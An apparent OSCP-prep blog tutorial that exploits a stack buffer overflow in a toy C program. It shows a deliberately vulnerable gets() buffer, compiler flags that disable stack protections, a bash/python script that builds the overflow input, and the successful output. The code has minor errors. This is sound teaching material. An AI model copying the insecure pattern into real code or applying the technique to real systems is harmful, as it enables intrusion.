Total Pageviews

Saturday, May 1, 2021

Buffer Overflow essentials

 Hi Everyone,


I strat my new OSCP blog with a content that usually the people the people don't use to share, but is a technical skill that you of course,  should learn in order to pass the OSCP certification (25 points on the final note).

What is Buffer overflow?

Buffer overflow/ Buffer overrun is a software error produced when the program don't control the input user entry data size. 

This kind of software vulnerability allow the attacker overwrite memory sections on low level registers and get the control of the program flow.

You can find the complete description of this attack in the following link:

https://en.wikipedia.org/wiki/Buffer_overflow


Practice with Buffer overflow essentials:


For learn about buffer overflow we are going to use a simple code example, that i know that contain this kind of vulnerability.

#include <stdio.h>

int main(){

int cookie;
char buf[80];

printf("buf: %08x cookie: %08x \n", &buf, &cookie);
gets(buf);

if(cookie == 0x41424344){
print("You win");
}

}

This is the most simple example that you can find for understand the memory location overwrite. At the code you can find a couple of variables. one of them cookie and the other buf:
        int cookie;
char buf[80];

the cookie var is an integer uninitilized and the other is a buffer that allow get 80 bytes of input data size.

The execution  print the pointer to the memory position of the cookie and buffer variables.

./executable 
buf: ffc20ba0 cookie: ffc20bf0
My input data user entry........over write the memory 

The get function,  allow the user input the data to the program. Exploiting this code is It's so simple , you only need  understand that cookie has the memory position : 
        cookie: ffc20bf0

And this is different than the memory of evaluation condition:

        if(cookie == 0x41424344){
print("You win");
}

For this reason the program don't print : "You Win" And this is our objective 





How we can exploit this vulnerability ?


The strategy that we should follow in order to overwrite the memory and manipulate the flow of the program is, enter the right number of characters on the buffer, using the vulnerable gets function:



Overwrite the buffer content:




In that case the program execution find the high level if condition instruction and evaluate if the content of cookie variable is equals to: 0x41424344


And print the "You win" on the standard file descripor of program output.


Exploiting:


Exploiting tutorial execution:





Design of your first personal Exploit :


The complete code process exploiting execution:




The chosen develop language is bash (Linux scripting), but for exploit the binary execution on runtime we use one call to python in order to create the right input pattern:

Code Explanation:


Introduction:
#!/bin/bash -x  // bash header -x (debug option)


INPUT_FILE=$1 // set to var INPUT_FILE the first program argument
OUTPUT_BINARY=$2 // set to var OUTPUT_BINARY the second program argument


echo "\tInit process........"
echo "examine : $INPUT_FILE" // show data

Binary creation with gcc using source code:

gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack $INPUT_FILE -o $OUTPUT_BINARY 2>/dev/null && objdump -S $OUTPUT_BINARY | grep -A 4  "cookie == "


After binary creation we found the most important part of the process in order to anderstand the buffer overflow process, using assembler  program knowledges and objdump tool you can find the point on the source code that evaluate the if condition:



Obtain the memory position on little Endian (processor language):

export DIR=`objdump -S $OUTPUT_BINARY |grep -A 3 "cookie ==" | grep cmp | awk '{print "\x"$3"\x"$4"\x"$5"\x"$6}'`
echo "Dir overflow ... $DIR"
echo "\tInit exploit ......."
Exploiting Execution:
python3 -c "print(\"A\"*80+\"`echo $DIR`\")" | ./$OUTPUT_BINARY

Obviously you can do this:

python3 -c "print(\"A\"*80+\"<Your exploiting memory content>\")"

Compilation:
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack stack.c -o test
Execution:
./test 
buf: ffb78750 cookie: ffb787a0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA
you win!

Solution: 
Ax80 + 0x41424344
echo "\0x41\0x42\0x43\0x44" | xxd -ps -r && echo 
ABCD

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA

And this is all for this tutorial, i hope that this could be useful for the people that want to learn the basic overflow concepts. 
I want increase the content and level  ;)



at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...